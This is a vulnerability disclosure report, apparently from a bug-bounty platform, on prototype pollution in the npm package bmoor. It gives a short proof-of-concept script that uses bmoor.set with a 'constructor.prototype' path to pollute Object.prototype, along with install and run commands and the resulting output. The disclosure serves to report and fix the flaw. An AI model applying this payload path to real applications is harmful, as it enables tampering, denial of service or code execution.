Prototype Pollution in b-heilman/bmoor
Valid
Reported on
Nov 18th 2020
Description
bmoor
is vulnerable to Prototype Pollution
.
This package allowing for modification of prototype behavior, which may result in Information Disclosure/DoS/RCE.
Proof of Concept
- Create the following PoC file:
// poc.js
const bmoor = require('bmoor');
var obj = {}
console.log("Before : " + {}.polluted);
bmoor.set(obj,"constructor.prototype.polluted","Yes! Its Polluted");
console.log("After : " + {}.polluted);
- Execute the following commands in another terminal:
npm i bmoor # Install affected module
node poc.js # Run the PoC
- Check the Output:
Before : undefined
After : Yes! Its Polluted
to join this conversation